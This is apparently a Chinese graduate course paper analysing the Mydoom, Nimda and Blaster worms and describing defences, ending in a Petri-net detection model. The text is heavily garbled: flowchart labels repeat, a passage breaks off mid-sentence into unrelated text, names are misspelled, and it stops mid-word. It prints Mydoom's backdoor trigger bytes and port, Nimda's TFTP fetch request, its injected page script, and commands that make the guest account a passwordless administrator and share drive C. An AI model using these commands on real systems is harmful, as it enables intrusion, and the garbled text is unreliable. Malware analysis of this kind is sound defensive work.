蠕蟲病毒的特征與防治

算法設(shè)計(jì)與分析課程論文PAGE4研究生課程論文(2008-2009學(xué)年第二學(xué)期) 蠕蟲病毒的特征與防治摘要隨著網(wǎng)絡(luò)的發(fā)展，以網(wǎng)絡(luò)傳播的蠕蟲病毒利用網(wǎng)絡(luò)全球互聯(lián)的優(yōu)勢(shì)和計(jì)算機(jī)系統(tǒng)及網(wǎng)絡(luò)系統(tǒng)安全性上的漏洞，己經(jīng)成為計(jì)算機(jī)系統(tǒng)安全的一大的威脅。采用網(wǎng)絡(luò)傳播的蠕蟲病毒與傳統(tǒng)的計(jì)算機(jī)病毒在很多方面都有許多不同的新特點(diǎn)。本文對(duì)蠕蟲病毒的特征和防御策略進(jìn)行了研究，透徹分析了幾個(gè)流行的蠕蟲病毒的本質(zhì)特征和傳播手段，并提出了防治未知病毒以及變形病毒的解決方案與虛擬機(jī)相結(jié)合的基于攻擊行為的著色判決PN機(jī)蠕蟲檢測(cè)方法。關(guān)鍵詞:蠕蟲，病毒特征，病毒防治

1引言“蠕蟲”這個(gè)生物學(xué)名詞于1982年由XeroxPARC的JohnF.Shoeh等人最早引入計(jì)算機(jī)領(lǐng)域，并給出了計(jì)算機(jī)蠕蟲的兩個(gè)最基本的特征:“可以從一臺(tái)計(jì)算機(jī)移動(dòng)到另一臺(tái)計(jì)算機(jī)”和“可以自我復(fù)制”。最初，他們編寫蠕蟲的目的是做分布式計(jì)算的模型試驗(yàn)。1988年Morris蠕蟲爆發(fā)后，EugeneH.Spafford為了區(qū)分蠕蟲和病毒，給出了蠕蟲的技術(shù)角度的定義?！坝?jì)算機(jī)蠕蟲可以獨(dú)立運(yùn)行，并能把自身的一個(gè)包含所有功能的版本傳播到另外的計(jì)算機(jī)上。”計(jì)算機(jī)蠕蟲和計(jì)算機(jī)病毒都具有傳染性和復(fù)制功能，這兩個(gè)主要特性上的一致，導(dǎo)致二者之間是非常難區(qū)分的。近年來，越來越多的病毒采取了蠕蟲技術(shù)來達(dá)到其在網(wǎng)絡(luò)上迅速感染的目的。因而，“蠕蟲”本身只是“計(jì)算機(jī)病毒”利用的一種技術(shù)手段[1]。2蠕蟲病毒的特征及傳播1、一般特征:(1)獨(dú)立個(gè)體，單獨(dú)運(yùn)行;(2)大部分利用操作系統(tǒng)和應(yīng)用程序的漏洞主動(dòng)進(jìn)行攻擊;(3)傳播方式多樣;(4)造成網(wǎng)絡(luò)擁塞，消耗系統(tǒng)資源;(5)制作技術(shù)與傳統(tǒng)的病毒不同，與黑客技術(shù)相結(jié)合。2、病毒與蠕蟲的區(qū)別(l)存在形式上病毒寄生在某個(gè)文件上，而蠕蟲是作為獨(dú)立的個(gè)體而存在;名:gov、mil、borlan、bsd、example等，病毒同樣會(huì)避免包含以下信息的電子郵件帳戶:accoun、ca、certific、、icrosoft、info、linux等，當(dāng)病毒檢測(cè)到郵件地址中含有上述域名或帳戶時(shí)則忽略該地址，不將其加入到發(fā)送地址鏈表中。Worm.Mydoom.a病毒主程序流程如圖3-1所示，后門程序shimgapi.dll如圖3-2所示：開始開始初始化變量初始化變量檢測(cè)注冊(cè)表HKLM和HKUC下是否存在鍵Software\Mcirosoft\Windwos\CurrentVersion\Explorer\ComDlg32\Version，存在則代表已感染，否則創(chuàng)建該鍵，表示第一次感染檢測(cè)注冊(cè)表HKLM和HKUC下是否存在鍵Software\Mcirosoft\Windwos\CurrentVersion\Explorer\ComDlg32\Version，存在則代表已感染，否則創(chuàng)建該鍵，表示第一次感染第一次感染第一次感染否是創(chuàng)建互斥體SwebSipcS創(chuàng)建互斥體SwebSipcSmtxSO創(chuàng)建互斥體SwebSipcSmtxSO創(chuàng)建臨時(shí)隨機(jī)文件并用Notepade.exe打開(亂碼)失敗成功創(chuàng)建臨時(shí)隨機(jī)文件并用Notepade.exe打開(亂碼)返回返回生成庫文件shima生成庫文件shimapi.dll，并裝載該庫當(dāng)前時(shí)間是否大于終止時(shí)間，大于則返回當(dāng)前時(shí)間是否大于終止時(shí)間，大于則返回將病毒自身拷貝生成文件將病毒自身拷貝生成文件taskmon.exe修改注冊(cè)表增加病毒自啟動(dòng)項(xiàng)，HKLM\Software\Microsoft\Windows\CurrentVersion\Run修改注冊(cè)表增加病毒自啟動(dòng)項(xiàng)，HKLM\Software\Microsoft\Windows\CurrentVersion\Run”TaskMon”=”%system%taskmon.exe”判斷日期是否滿足觸發(fā)條件，若滿足則創(chuàng)建線程無限循環(huán)鏈接Sco網(wǎng)站，并發(fā)送信息進(jìn)行DOS攻擊判斷日期是否滿足觸發(fā)條件，若滿足則創(chuàng)建線程無限循環(huán)鏈接Sco網(wǎng)站，并發(fā)送信息進(jìn)行DOS攻擊打開注冊(cè)表找到kazaa共享路徑，并將當(dāng)前運(yùn)行進(jìn)程文件副本拷貝至該目錄下，擴(kuò)展名為.exe、.scr、.pif、.bat四者之一打開注冊(cè)表找到kazaa共享路徑，并將當(dāng)前運(yùn)行進(jìn)程文件副本拷貝至該目錄下，擴(kuò)展名為.exe、.scr、.pif、.bat四者之一創(chuàng)建無限循環(huán)掃描線程掃描wab文件、IE臨時(shí)文件、硬盤中的文本文件，將掃描到的郵件地址、用戶進(jìn)行過濾，然后加入到郵件地址隊(duì)列創(chuàng)建無限循環(huán)掃描線程掃描wab文件、IE臨時(shí)文件、硬盤中的文本文件，將掃描到的郵件地址、用戶進(jìn)行過濾，然后加入到郵件地址隊(duì)列創(chuàng)建無限循環(huán)的發(fā)送郵件線程massmail_main_th，從掃描得到的郵件地址隊(duì)列取地址發(fā)送郵件，郵件的發(fā)送人地址、主題、內(nèi)容、附件名稱隨機(jī)，附件即病毒主體創(chuàng)建無限循環(huán)的發(fā)送郵件線程massmail_main_th，從掃描得到的郵件地址隊(duì)列取地址發(fā)送郵件，郵件的發(fā)送人地址、主題、內(nèi)容、附件名稱隨機(jī)，附件即病毒主體結(jié)束結(jié)束圖3-1Mydoom病毒主體流程圖開始開始加載動(dòng)態(tài)庫加載動(dòng)態(tài)庫當(dāng)系統(tǒng)為Wni當(dāng)系統(tǒng)為Wni9X時(shí)，注冊(cè)為系統(tǒng)服務(wù)查詢當(dāng)前線程信息，根據(jù)此信息獲得動(dòng)態(tài)庫路徑，修改注冊(cè)表鍵將HKEY_CLASSES_R00T\CLSID\{E6FB5E20-DE35-llCF-9C87-00AA005127ED}\InProcServer32，(Default)=查詢當(dāng)前線程信息，根據(jù)此信息獲得動(dòng)態(tài)庫路徑，修改注冊(cè)表鍵將HKEY_CLASSES_R00T\CLSID\{E6FB5E20-DE35-llCF-9C87-00AA005127ED}\InProcServer32，(Default)=”%system%\webcheek.dll”改為”%System%\shimgapi.dll”，在系統(tǒng)啟動(dòng)時(shí)，shimgapi.dll會(huì)隨著EXLPORER.EXE的啟動(dòng)而得到執(zhí)行創(chuàng)建后門端口并監(jiān)聽，根據(jù)接收的首字節(jié)確定轉(zhuǎn)發(fā)或接收數(shù)據(jù)并執(zhí)行創(chuàng)建后門端口并監(jiān)聽，根據(jù)接收的首字節(jié)確定轉(zhuǎn)發(fā)或接收數(shù)據(jù)并執(zhí)行每半秒檢查一次注冊(cè)表，若病毒主體路徑被刪除則補(bǔ)上每半秒檢查一次注冊(cè)表，若病毒主體路徑被刪除則補(bǔ)上結(jié)束結(jié)束圖3-2shimgapi.dll流程圖Mydoom蠕蟲病毒除造成了網(wǎng)絡(luò)資源的浪費(fèi)，阻塞網(wǎng)絡(luò)，被攻擊網(wǎng)站不能提供正常服務(wù)外，最大的危險(xiǎn)在于安裝了后門程序。該后門即shimgapi.dll，通過修改注冊(cè)表，使自身隨著EXPLORER的啟動(dòng)而運(yùn)行，將自己加載到了資源管理器的進(jìn)程空間中。后門監(jiān)聽3127端口，如果該端口被占用，則遞增，但不大于3198。后門提供了兩個(gè)功能:(1)作為端口轉(zhuǎn)發(fā)代理;(2)作為后門，接收上傳程序并執(zhí)行。當(dāng)3127端口收到連接之后，如果recv的第一個(gè)字符是x04，轉(zhuǎn)入端口轉(zhuǎn)發(fā)流程。若第二個(gè)字符是0x01，則取3、4兩個(gè)字符作為目標(biāo)端口，取第5-8四個(gè)字節(jié)作為目標(biāo)IP地址，進(jìn)行連接并和當(dāng)前socket數(shù)據(jù)轉(zhuǎn)發(fā)。recv的第一個(gè)字符如果是x85，則轉(zhuǎn)入執(zhí)行命令流程。先接收四個(gè)字節(jié)，轉(zhuǎn)成主機(jī)字節(jié)序后驗(yàn)證是否是x133c9ea2，驗(yàn)證通過則創(chuàng)建臨時(shí)文件接收數(shù)據(jù)，接收完畢運(yùn)行該文件。也就是說，只要我們把任意一個(gè)可執(zhí)行文件的頭部，加上五個(gè)字符:x85133c9ea2，作為數(shù)據(jù)發(fā)送到感染了Mydoom.a蠕蟲機(jī)器的3127端口，這個(gè)文件，就會(huì)在系統(tǒng)上被執(zhí)行，從而對(duì)被感染系統(tǒng)的安全造成了極大的威脅。Nimda蠕蟲病毒在Nimda蠕蟲病毒出現(xiàn)以前，“蠕蟲”技術(shù)一直是獨(dú)立發(fā)展的。Nmida病毒第一次將“蠕蟲”技術(shù)和“計(jì)算機(jī)病毒”技術(shù)結(jié)合起來。從Nimda的攻擊方式來看，Nimda蠕蟲病毒只攻擊微軟的WinX系列操作系統(tǒng)，它通過電子郵件、網(wǎng)絡(luò)臨近共享文件、IE瀏覽器的內(nèi)嵌MIME類型自動(dòng)執(zhí)行漏洞、IIS服務(wù)器文件目錄遍歷漏洞、CodeRedII和Sadmind/IIS蠕蟲留下的后門共五種方式進(jìn)行傳播，其中前三種方式是病毒傳播方式。關(guān)于蠕蟲病毒的分析，在很多文獻(xiàn)[3]中都有提到，本文在這些文獻(xiàn)的基礎(chǔ)上，重點(diǎn)針對(duì)幾種典型的蠕蟲病毒在技術(shù)實(shí)現(xiàn)上的特點(diǎn)進(jìn)行分析，以期找到他們的一些共性。1.被利用的系統(tǒng)漏洞描述(1)微軟IE異常處理MIME頭漏洞IE在處理MIME頭中“Content2Type:”處指定的某些類型時(shí)存在問題，攻擊者可以利用這類缺陷在IE客戶端執(zhí)行任意命令。(2)MicrosoftIISUniCode解碼目錄遍歷漏洞微軟IIS4.0和IIS5.0在UniCdoe字符解碼的實(shí)現(xiàn)中存在一個(gè)安全漏洞，導(dǎo)致用戶可以遠(yuǎn)程通過IIS執(zhí)行任意命令。(3)MicrosoftIISCGI文件名錯(cuò)誤解碼漏洞微軟IIS4.0/5.0在處理CGI程序文件名時(shí)存在一個(gè)安全漏洞，由于錯(cuò)誤地對(duì)文件名進(jìn)行了兩次解碼，攻擊者可能利用這個(gè)漏洞執(zhí)行任意系統(tǒng)命令。(4)“CodeRedII”和Sadmind/IIS蠕蟲留下的后門程序。2.傳播方式(l)郵件傳播蠕蟲會(huì)向被攻擊者發(fā)送一封攜帶了蠕蟲附件的郵件。這個(gè)郵件由兩部分MIME類型的信息組成:第一部分的MIME類型為“text/html”，但卻沒有包含文本，因此看起來是空的;第二部分的MIME類型為“audio/x2wav”，但它實(shí)際上攜帶的是一個(gè)名為“Readme.exe”的base64編碼的可執(zhí)行附件。利用了“微軟IE異常處理MIME頭漏洞”安全漏洞，任何運(yùn)行在x86平臺(tái)下并且使用微軟IE5.5SP1或之前版本(IE5.01SP2除外)來顯示HTML郵件的郵件客戶端軟件，都將自動(dòng)執(zhí)行郵件附件。用戶甚至只需打開或預(yù)覽郵件即可使蠕蟲被執(zhí)行[4]。被蠕蟲攻擊的目標(biāo)郵件的地址從下列兩個(gè)來源中獲得:①用戶WebCache文件夾中的*.htm和*.html文件②用戶通過MAPI服務(wù)收到Email郵件的內(nèi)容蠕蟲在這些文件中搜索看起來像郵件地址的字符串，然后向這些地址發(fā)送一份包含蠕蟲拷貝的郵件。Nimda蠕蟲在Windows注冊(cè)表中記錄最后一批郵件發(fā)送的時(shí)間，然后每十天重復(fù)搜索郵件地址并重新發(fā)送蠕蟲郵件。(2)IISWEB服務(wù)器傳播蠕蟲會(huì)利用兩個(gè)IIS服務(wù)器的目錄遍歷漏洞和以前的一些IIS蠕蟲(RdeCodeII和Sadmind/IIS)留下的后門程序來進(jìn)行傳播。蠕蟲按照下列幾率來選擇攻擊目標(biāo)的IP地址:①50%的幾率，在與本地IP地址前兩字節(jié)相同的地址(B類網(wǎng)絡(luò))中選擇一個(gè)②25%的幾率，在與本地IP地址前一字節(jié)相同的地址(A類網(wǎng)絡(luò))中選擇一個(gè)③25%的幾率，隨機(jī)選擇IP地址。蠕蟲首先會(huì)啟動(dòng)一個(gè)TFTP服務(wù)器，監(jiān)聽UDP/69端口。在開啟TFTP服務(wù)器和確定攻擊P1地址之后，Nimda就開始對(duì)這個(gè)IP地址進(jìn)行掃描。首先，掃描“RdeCodeII”留下的后門。由于被“RedCodeII”攻擊過的系統(tǒng)中的Web虛擬目錄中會(huì)留下一個(gè)名為Root.exe的后門程序，Nimda就首先掃描“/Scripts/root.exe”，如果這個(gè)程序存在的話，Nimda蠕蟲就企圖通過它在系統(tǒng)上執(zhí)行命令。它執(zhí)行類似下列命令來向其發(fā)送蠕蟲代碼:GET/scripts/root.exe?/c+tftp+2i+localip+GET+Admin.dllHTTP/1.0其中Localip是本主機(jī)的IP地址，這樣就通過TFTP協(xié)議將本地的Admin.dll文件傳播過去，而這個(gè)Admin.dll實(shí)際上就是蠕蟲代碼本身，只不過它在這里是以*.dll文件的形式存在。這樣做的目的，就像前面所講述的那樣是為了利用IIS的系統(tǒng)文件列表權(quán)限提升漏洞來提升蠕蟲運(yùn)行的權(quán)限。在將Admin.dll上傳到目標(biāo)主機(jī)上之后，蠕蟲就會(huì)通過發(fā)送:GET/scripts/Admin.dllHTTP/1.0的請(qǐng)求來運(yùn)行蠕蟲。此時(shí)，蠕蟲是以系統(tǒng)管理員權(quán)限運(yùn)行的。其次，如果在掃描/Scripts/root.exe時(shí)沒有成功，即目標(biāo)機(jī)中沒有“紅色代碼II”留下的后門程序，那么蠕蟲程序會(huì)繼續(xù)掃描目標(biāo)上的Unicode漏洞以及二次解碼漏洞，以期通過這兩個(gè)漏洞在系統(tǒng)上執(zhí)行命令，如果發(fā)現(xiàn)其中某一個(gè)漏洞，蠕蟲就會(huì)重復(fù)利用/scripts/root.exe所發(fā)送的TFTP命令來上傳Admin.dll，然后運(yùn)行。Admin.dll作為ISAPI程序運(yùn)行后，會(huì)把自身拷貝到Windows系統(tǒng)文件夾命名Mmc.exe，然后以\帶參數(shù)方式運(yùn)行“Mmc.exe-qusery9bnow”。這樣就完成了通過IIS進(jìn)行傳播的過程。(3)文件共享傳播。蠕蟲訪問共享網(wǎng)絡(luò)資源，然后開始檢測(cè)遠(yuǎn)程系統(tǒng)上的文件。如果發(fā)現(xiàn)一個(gè)*.exe文件，它將蠕蟲代碼加到原來文件的前面，下次執(zhí)行被感染文件時(shí)，將首先執(zhí)行蠕蟲代碼。它并不感染winzip32.exe。如果發(fā)現(xiàn)*.doc文件，它將自己拷貝到*.doc文件所在目錄下，改名為Riched32.dll，并設(shè)置為隱藏、系統(tǒng)屬性。由于Microsoftword在打開該*.doc文件時(shí)，會(huì)首先在當(dāng)前目錄尋找Riched32.dll，這將首先運(yùn)行蠕蟲代碼，這也會(huì)大大增大遠(yuǎn)程用戶的感染幾率。它也會(huì)利用找到的文檔文件的名字創(chuàng)建以*.eml和*.nws后綴的文件，這些文件也是帶有蠕蟲拷貝的MIME編碼的文件。(4)通過網(wǎng)頁進(jìn)行傳播。對(duì)于受感染的WWW服務(wù)器，Nimda會(huì)修改其上的WWW網(wǎng)頁文件，使得瀏覽該網(wǎng)站的用戶受其感染。當(dāng)蠕蟲通過Admin.dll運(yùn)行時(shí)，蠕蟲生成的新程序(Mmc.exe)會(huì)在整個(gè)硬盤中搜索后綴為:*.HTML，*.APS，*.HTM，文件名為:Default，Index，Main，Readme的文件。一旦發(fā)現(xiàn)了這樣的文件，蠕蟲會(huì)在該目錄下創(chuàng)建一個(gè)Readme.eml文件，它是一個(gè)由兩部分組成的MIME編碼的文件，里面也包含了蠕蟲拷貝。然后蠕蟲會(huì)在找到的文件的末尾增加如下Javascript代碼:“<html><scriptlanguage=”Javascript”>window.open(”readme.eml“，null，“resizable=no，top=6000，left=6000”)</script></html>”這樣，其他用戶如果使用瀏覽器瀏覽被修改的網(wǎng)頁或者資源管理(打開了預(yù)覽功能)來瀏覽共享服務(wù)器上的Readme.mel文件時(shí)，利用IE瀏覽器異常處理MIME頭漏洞，蠕蟲就可以傳播到新的客戶端上。(5)通過修改*.exe文件進(jìn)行傳播。前面幾種傳播方式都是通過網(wǎng)絡(luò)方式進(jìn)行的，也是Nimda最常用的傳染方式，它還會(huì)像普通的病毒那樣通過文件來進(jìn)行傳播。Nimda蠕蟲首先選擇感染*.exe文件，這樣當(dāng)通過軟盤或局域網(wǎng)進(jìn)行文件復(fù)制時(shí)，就會(huì)把蠕蟲程序傳播到其它的機(jī)器上面。感染*.exe文件的具體做法是:①先查找注冊(cè)表中HKEYLOCALMACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\APPPathS鍵的內(nèi)容，這個(gè)鍵值存放了主機(jī)上的可執(zhí)行文件名字，一旦找到Nimda就會(huì)以病毒的方式感染這些文件。②把原來的*.exe文件作為資源存儲(chǔ)在新的*.exe文件當(dāng)中，這樣當(dāng)運(yùn)行新的*.exe文件時(shí)首先執(zhí)行蠕蟲程序，然后再調(diào)用原來的*.exe文件來執(zhí)行，這樣對(duì)于用戶來說感覺上只是執(zhí)行了原來的*.exe文件。還有一點(diǎn)，Nimda如果發(fā)現(xiàn)*.exe文件名為Winzip32.exe，則不進(jìn)行感染。這樣做可能是為了避免重要程序WinZip無法運(yùn)行導(dǎo)致系統(tǒng)崩潰。(6)通過Word文檔進(jìn)行傳播。因?yàn)樾薷?.exe文件容易被殺毒軟件檢測(cè)到，所以Nimda還通過替換Word程序的一個(gè)動(dòng)態(tài)連接庫文件來達(dá)到傳播的目的。蠕蟲程序首先把自身復(fù)制到windows目錄中命名為Riched20.dll。然后它會(huì)搜索本地的共享目錄中包含*.doc文件的目錄，一旦找到，就會(huì)把自身復(fù)制到目錄中并命名為Riched20.dll，并將文件屬性設(shè)置為隱藏和系統(tǒng)屬性。由于Microsoftword在打開該*.doc文件時(shí)，會(huì)首先在當(dāng)前目錄尋找Riched20.dll并加載，這樣就會(huì)運(yùn)行到蠕蟲代碼了。不僅如此蠕蟲還用找到的文檔文件的名字加上.eml后綴來創(chuàng)建新文件，這些文件也是帶有蠕蟲拷貝的MIME編碼的文件。這樣做會(huì)使得系統(tǒng)中出現(xiàn)大量.eml文件。(7)系統(tǒng)感染技術(shù)蠕蟲會(huì)檢查注冊(cè)表中的如下表項(xiàng):HKEYLOCALMACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\APPPathsHKEYLOCALMACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders然后感染所有找到的程序。蠕蟲會(huì)將自身拷貝到\windwos\System目錄中，命名為Load.exe，并修改System.ini文件，將Shell部分改為如下內(nèi)容:Shell=explorer.exeload.exe-dontrunold這樣每次系統(tǒng)重啟后都會(huì)運(yùn)行蠕蟲拷貝。它會(huì)用自身拷貝替換Windows目錄下的Riched20.dll，這樣下次執(zhí)行word時(shí)會(huì)自動(dòng)執(zhí)行這個(gè)蠕蟲。如果蠕蟲是以Readme.exe文件名被執(zhí)行，它會(huì)將自身拷貝到Windows臨時(shí)目錄中，并使用隨機(jī)文件名，例如tmp.exe等。蠕蟲在第一次執(zhí)行時(shí)會(huì)尋找Explorer進(jìn)程，將自己的進(jìn)程注冊(cè)為Explorer的一個(gè)遠(yuǎn)程線程。這樣即使用戶退出系統(tǒng)，蠕蟲仍然可以繼續(xù)執(zhí)行。(8)后門安裝技術(shù)Nimda蠕蟲通過修改一些注冊(cè)表項(xiàng)以降低系統(tǒng)安全性，同時(shí)也安裝系統(tǒng)后門。蠕蟲會(huì)將所有驅(qū)動(dòng)器設(shè)置成共享狀態(tài)，它會(huì)編輯如下注冊(cè)表項(xiàng):HKEY_LOCAL_MACHINE\Software\Mierosoft\Windows\CurrentVersion\Network\LanMan\[C$->Z$]蠕蟲會(huì)刪除下列注冊(cè)表項(xiàng)的所有子鍵以禁止共享安全性:HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security蠕蟲會(huì)修改下列注冊(cè)表項(xiàng):HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced調(diào)整Hidden，ShowsuperHidden和HideFileExt鍵值，使得使用資源管理器無法顯示隱藏文件。這可以保護(hù)蠕蟲代碼，以免其被發(fā)現(xiàn)。通過執(zhí)行下列命令，蠕蟲還激活了Guest用戶，將其密碼設(shè)置為空，并將其加入到Administrators組中(對(duì)于WindowsNT/2000/XP用戶):netuserguest/addnetuserguest/activenetuserguest“”netlocalgroupAdministratorsguestnetlocalgroupGuestsguest/add通過執(zhí)行下列命令，蠕蟲將C:\設(shè)置為完全共享:netsharec$=c:\3.3沖擊波病毒病毒的行為特征為[5]:(1)病毒運(yùn)行時(shí)會(huì)將自身復(fù)制為%systemdir%\msblast.exe，%systemdir%是一個(gè)變量，它指的是操作系統(tǒng)安裝目錄中的系統(tǒng)目錄，默認(rèn)是:“c:\windows\system”或“c:\Winnt\system32”。(2)病毒運(yùn)行時(shí)會(huì)在系統(tǒng)中建立一個(gè)名為:“BILLY”的互斥量，目的是病毒保證在內(nèi)存中只有一份病毒體，避免用戶發(fā)現(xiàn)。(3)病毒運(yùn)行時(shí)會(huì)在內(nèi)存中建立一個(gè)名為:“msblast.exe”的進(jìn)程，該進(jìn)程就是活的病毒體。(4)病毒會(huì)修改注冊(cè)表，在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run中添加鍵值:“windowsautoupdate”=“msblast.exe”，以便每次啟動(dòng)系統(tǒng)時(shí)，病毒都會(huì)運(yùn)行。(5)病毒體內(nèi)隱藏有一段文本信息:IjustwanttosayLOVEYOUSAN!!Billygateswhydoyoumakethispossible?Stopmakingmoneyandyou’reyoursoftware!!(6)病毒會(huì)以20秒為間隔，每20秒檢測(cè)一次網(wǎng)絡(luò)狀態(tài)，當(dāng)網(wǎng)絡(luò)可用時(shí)，病毒會(huì)在本地的UDP/69端口上建立一個(gè)TFPT服務(wù)器，并啟動(dòng)一個(gè)攻擊傳播線程，不斷的隨機(jī)生成攻擊地址，進(jìn)行攻擊，另外該病毒攻擊時(shí)，會(huì)首先搜索子網(wǎng)的IP地址，以便就近攻擊。(7)當(dāng)病毒掃描到計(jì)算機(jī)后，就會(huì)向目標(biāo)計(jì)算機(jī)的TCP/135端口發(fā)送數(shù)據(jù)。(8)當(dāng)病毒攻擊成功后，目標(biāo)計(jì)算機(jī)便會(huì)監(jiān)聽的TCP/4444端口作為后門，并綁定cmd.exe。然后蠕蟲會(huì)連接到這個(gè)端口，發(fā)送TFTP下載信息，目標(biāo)主機(jī)通過TFTP下載病毒并運(yùn)行病毒。(9)當(dāng)病毒攻擊失敗時(shí)，可能會(huì)造成沒有打補(bǔ)丁的Wind。邢系統(tǒng)RCP服務(wù)崩潰，WindowXP系統(tǒng)可能會(huì)自動(dòng)重啟計(jì)算機(jī)。(10)病毒檢測(cè)到當(dāng)前系統(tǒng)月份是8月之后或者日期是巧日之后，就會(huì)向微軟的更新站點(diǎn)“”發(fā)動(dòng)拒絕服務(wù)攻擊，使微軟網(wǎng)站的更新站點(diǎn)無法為用戶提供服務(wù)。從上面沖擊波病毒的行為特征我們可以看出，沖擊波病毒與其他兩個(gè)病毒的不同點(diǎn)在于其傳播方式。沖擊波病毒利用了windows系統(tǒng)的DCOMRPC緩沖區(qū)漏洞攻擊系統(tǒng)，一旦攻擊成功，病毒體將會(huì)被傳送到對(duì)方計(jì)算機(jī)中進(jìn)行感染，不需要用戶的參與，而其他兩種是通過郵件附件的方式，引誘用戶點(diǎn)擊執(zhí)行。破壞性方面因病毒而異，病毒的執(zhí)行、自啟動(dòng)方面三種病毒都相似。RemoteProcedureCall(RPC)是運(yùn)用于Windows操作系統(tǒng)上的一種協(xié)議。RPC提供相互處理通信機(jī)制，允許運(yùn)行該程序的計(jì)算機(jī)在一個(gè)遠(yuǎn)程系統(tǒng)上執(zhí)行代碼。RPC協(xié)議本身源于OSF(openSoftwareFoundation)RPC協(xié)議，后來又另外增加了一些Microsoft專用擴(kuò)展功能。RPC中處理TCP/IP信息交換的模塊由于錯(cuò)誤的處理畸形信息，導(dǎo)致存在緩沖區(qū)溢出漏洞，遠(yuǎn)程攻擊者可利用此缺陷以本地系統(tǒng)權(quán)限在系統(tǒng)上執(zhí)行任意指令，如安裝程序、查看或更改、刪除數(shù)據(jù)或建立系統(tǒng)管理員權(quán)限的帳戶。據(jù)CERT安全小組稱，操作系統(tǒng)中超過50%的安全漏洞都是由內(nèi)存溢出引起的，其中大多數(shù)與微軟技術(shù)有關(guān)，這些與內(nèi)存溢出相關(guān)的安全漏洞正在被越來越多的蠕蟲病毒所利用。緩沖區(qū)溢出是指當(dāng)計(jì)算機(jī)程序向緩沖區(qū)內(nèi)填充的數(shù)據(jù)位數(shù)超過緩沖區(qū)本身的容量時(shí)，溢出的數(shù)據(jù)就會(huì)覆蓋在合法數(shù)據(jù)上，這些數(shù)據(jù)可能是數(shù)值、下一條指令的指針，或者是其他程序的輸出內(nèi)容。一般情況下，覆蓋其他數(shù)據(jù)區(qū)的數(shù)據(jù)是沒有意義的，最多造成應(yīng)用程序錯(cuò)誤，但是如果輸入的數(shù)據(jù)是經(jīng)過“黑客”或者病毒精心設(shè)計(jì)的，覆蓋緩沖區(qū)的數(shù)據(jù)恰恰是“黑客”或者病毒的入侵程序代碼，一旦多余字節(jié)被編譯執(zhí)行，“黑客”或者病毒就有可能為所欲為，獲取系統(tǒng)的控制權(quán)。溢出根源在于編程:緩沖區(qū)溢出是由編程錯(cuò)誤引起的。如果緩沖區(qū)被寫滿，而程序沒有去檢查緩沖區(qū)邊界，也沒有停止接收數(shù)據(jù)，這時(shí)緩沖區(qū)溢出就會(huì)發(fā)生。因此防止利用緩沖區(qū)溢出發(fā)起的攻擊，關(guān)鍵在于程序開發(fā)者在開發(fā)程序時(shí)仔細(xì)檢查溢出情況，不允許數(shù)據(jù)溢出緩沖區(qū)。此外,用戶需要經(jīng)常登錄操作系統(tǒng)和應(yīng)用程序提供商的網(wǎng)站，跟蹤公布的系統(tǒng)漏洞，及時(shí)下載補(bǔ)丁程序，彌補(bǔ)系統(tǒng)漏洞。4蠕蟲病毒的防治蠕蟲病毒不同于一般的文件型病毒，既表現(xiàn)出了強(qiáng)大的功能，也表現(xiàn)出了自身的特點(diǎn)，變種多，功能相似，但當(dāng)前反病毒廠商仍然利用傳統(tǒng)的病毒特征串查毒法進(jìn)行查毒。雖然隨著病毒庫的與日俱增，效率與日俱下，倒也還能滿足目前的反病毒要求，但瓊斯病毒的出現(xiàn)，徹底宣判了單純特征串查毒法的死刑，迫切需要一種新式高效的查毒方法來應(yīng)對(duì)瓊斯這類變形蠕蟲病毒。筆者總結(jié)了現(xiàn)有的蠕蟲病毒非特征串檢測(cè)方法，并提出了自己的觀點(diǎn)。4.1一般防治措施因?yàn)槟壳暗娜湎x病毒越來越表現(xiàn)出三種傳播趨勢(shì):郵件附件、無口令或者弱口令共享、利用操作系統(tǒng)或者應(yīng)用系統(tǒng)漏洞來傳播病毒，所以防治蠕蟲也應(yīng)從這三方面下手:(1)針對(duì)通過郵件附件傳播的病毒:在郵件服務(wù)器上安裝殺毒軟件，對(duì)附件進(jìn)行殺毒:在客戶端(主要是out1ook)限制訪問附件中的特定擴(kuò)展名的文件，如.pif、.vbs、.js、.exe等;用戶不運(yùn)行可疑郵件攜帶的附件。(2)針對(duì)弱口令共享傳播的病毒:嚴(yán)格來說，通過共享和弱口令傳播的蠕蟲大多也利用了系統(tǒng)漏洞。這類病毒會(huì)搜索網(wǎng)絡(luò)上的開放共享并復(fù)制病毒文件，更進(jìn)一步的蠕蟲還自帶了口令猜測(cè)的字典來破解薄弱用戶口令，尤其是薄弱管理員口令。對(duì)于此類病毒，在安全策略上需要增加口令的強(qiáng)度策略，保證必要的長度和復(fù)雜度;通過網(wǎng)絡(luò)上的其他主機(jī)定期掃描開放共享和對(duì)登錄口令進(jìn)行破解嘗試，發(fā)現(xiàn)問題及時(shí)整改。(3)針對(duì)通過系統(tǒng)漏洞傳播的病毒:配置WindowsUpdate自動(dòng)升級(jí)功能，使主機(jī)能夠及時(shí)安裝系統(tǒng)補(bǔ)丁，防患于未然;定期通過漏洞掃描產(chǎn)品查找主機(jī)存在的漏洞，發(fā)現(xiàn)漏洞，及時(shí)升級(jí);關(guān)注系統(tǒng)提供商、安全廠商的安全警告，如有問題，則采取相應(yīng)措施。(4)重命名或刪除命令解釋器:如Windows系統(tǒng)下的WScriPt.exe;通過防火墻禁止除服務(wù)端口外的其他端口，切斷蠕蟲的傳播通道和通信通道。4.2基于攻擊行為的著色判決NP機(jī)入侵檢測(cè)系統(tǒng)模型基于攻擊行為的著色判決NP機(jī)入侵檢測(cè)系統(tǒng)模型是成都信息安全與國家計(jì)算網(wǎng)格實(shí)驗(yàn)室劉培順博士提出的，該模型利用Petri網(wǎng)理論結(jié)合人工智能技術(shù)建立了適合攻擊行為分析與檢測(cè)的理論和方法[6]。Petri網(wǎng)是由CarlAsamPetri博士在1962年提出的，它是一種網(wǎng)狀信息流模型，包括條件和事件兩類結(jié)點(diǎn)，在這兩類結(jié)點(diǎn)的有向二分圖的基礎(chǔ)上添加表示狀態(tài)信息的托肯(token)分布，并按引發(fā)規(guī)則使得事件驅(qū)動(dòng)狀態(tài)演變，從而反應(yīng)系統(tǒng)動(dòng)態(tài)運(yùn)行過程。P